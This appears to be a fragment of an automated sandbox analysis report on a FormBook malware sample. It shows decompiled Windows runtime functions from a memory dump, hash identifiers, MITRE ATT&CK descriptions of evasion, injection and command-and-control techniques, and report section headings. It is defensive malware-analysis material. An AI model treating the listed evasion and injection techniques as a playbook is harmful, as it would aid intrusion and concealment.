			E0523AAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x0523aab6
0x0523aabb
0x0528a442
0x00000000
0x0528a448
0x0528a454
0x0528a454
0x0523aac1
0x0523aac1
0x0523aac6
0x0523aac6

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: fa7a6d37963cac1ec07a7365d3fe42f3f4eeb1f0e830bc7634795a131cd89f3d
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction Fuzzy Hash: E5D09235262981CFD6168B08C554B1533A4BB04A40FC504A0E405CB761E728D940CA00

Uniqueness

Uniqueness Score: -1.00%

Function 052AA537, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E052AA537(intOrPtr _a4, intOrPtr _a8) {

				return L05248E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}

0x052aa553

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction ID: 3c20b658501cd13b1feb17b1b023f7ed45ffb2c564a40264af26f25658976b90
Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
Instruction Fuzzy Hash: 46C01232290248BBCB166E81CC00F167B2AEB94B60F008010BA080A5608632E970EA84

Uniqueness

Uniqueness Score: -1.00%

Function 0522DB40, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0522DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L05244620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}

0x0522db4d
0x0522db54
0x0522db5f
0x0522db56
0x0522db56
0x0522db5c
0x0522db5c

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction ID: 03902ad5a2be588ba634a5fd77e63d5d796271004c11abc6e9aa457fe761f3ef
Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
Instruction Fuzzy Hash: CAC08C303A0A01AAEB262F20CD01B0036A0BF00B01F4400A0A701DA0F0DB78D802EA00

Uniqueness

Uniqueness Score: -1.00%

Function 0522AD30, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0522AD30(intOrPtr _a4) {

				return L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x0522ad49

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction ID: e0b565072a3a4fe473bcbcbe947c991e0154b8c61b7771a58a8bf5261a0a84fd
Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
Instruction Fuzzy Hash: 6FC02B331C0248BBC7126F45CD00F027F2DEB90B60F040020F7040B671CA32EC61D988

Uniqueness

Uniqueness Score: -1.00%

Function 05243A1C, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05243A1C(intOrPtr _a4) {
				void* _t5;

				return L05244620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}

0x05243a35

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction ID: 49701369db9cc600911e2c1f62106194e359902a92b6dff00a27070a89601e02
Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
Instruction Fuzzy Hash: 9FC08C32180248BBCB127E41DC00F017B29EB90B60F000020BA040A5608532EC60D988

Uniqueness

Uniqueness Score: -1.00%

Function 052376E2, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E052376E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L052477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}

0x052376e4
0x00000000
0x052376f8
0x052376fd

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction ID: cb71be9d9c93ee44629911c5632683c18027a3318fdff16df2f75de09fe138e2
Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
Instruction Fuzzy Hash: 40C08CF02612815AEF2A5708CE36F313650FF08608F8C01ACAA0A294A2C368A903CA08

Uniqueness

Uniqueness Score: -1.00%

Function 052536CC, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E052536CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L05244620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}

0x052536d2
0x052536e8
0x052536d4
0x052536e5
0x052536e5

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction ID: d94b47094b3398c620d8770a0483b7146d982a4de5171b15eaa428d9c0dbf8ca
Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
Instruction Fuzzy Hash: 99C02B70370440BBDB197F30CD00F157294FF00A71F6407587220494F0D538DC00E504

Uniqueness

Uniqueness Score: -1.00%

Function 05247D50, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05247D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}

0x05247d56
0x05247d5b
0x05247d60
0x05247d5d
0x05247d5d
0x05247d5d

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 5f9267907dfba10def3f3830a26772608d015977a1818d1b5d5d07cc231d5339
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: E4B09234321941CFCF1ADF28C080F2533E4FB44A40F8800D0E404CBA20D329E8008A00

Uniqueness

Uniqueness Score: -1.00%

Function 05252ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E05252ACB() {
				void* _t5;

				return E0523EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x05252adc

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 0eea968698c2b4d1c5bc724c88380ad69790f537d6c3714370f17976acc2b202
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 1FB01232D20440CFCF03EF40C611B197336FF00750F064490900127930C228EC05CB40

Uniqueness

Uniqueness Score: -1.00%

Function 052BFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E052BFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0526CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E052B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E052B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x052bfdda
0x052bfde2
0x052bfde5
0x052bfdec
0x052bfdfa
0x052bfdff
0x052bfe0a
0x052bfe0f
0x052bfe17
0x052bfe1e
0x052bfe19
0x052bfe19
0x052bfe19
0x052bfe20
0x052bfe21
0x052bfe22
0x052bfe25
0x052bfe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 052BFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 052BFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 052BFE01

Memory Dump Source

Source File: 00000009.00000002.609101316.0000000005200000.00000040.00000001.sdmp, Offset: 05200000, based on PE: true

Associated: 00000009.00000002.609488564.000000000531B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.609500570.000000000531F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 0cea2404ec4e4e1c245c989fafd7fdb69323fbd6bd335f2552993d3514eb3ca3
Instruction ID: 30259e685c89e9508de2566bba693bb3cfa48351442a94f1b6b175cc1dd3d7d5
Opcode Fuzzy Hash: 0cea2404ec4e4e1c245c989fafd7fdb69323fbd6bd335f2552993d3514eb3ca3
Instruction Fuzzy Hash: 2DF02236310201BBE6201A45CC06F63BB6AEF40770F140204FA685A1D0EAA3F87092A4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report UaTmOE6yP9

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Function 00418690, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Function 0041868A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15
filenativeCOMMON

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004185DA, Relevance: 1.5, APIs: 1, Instructions: 43
filenativeCOMMON

Function 004185E0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 004187C0, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 00418710, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 004088D0, Relevance: .1, Instructions: 92
COMMON

Function 0040722D, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
threadwindowCOMMON

Function 004188B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Function 00418A41, Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Function 004188F0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON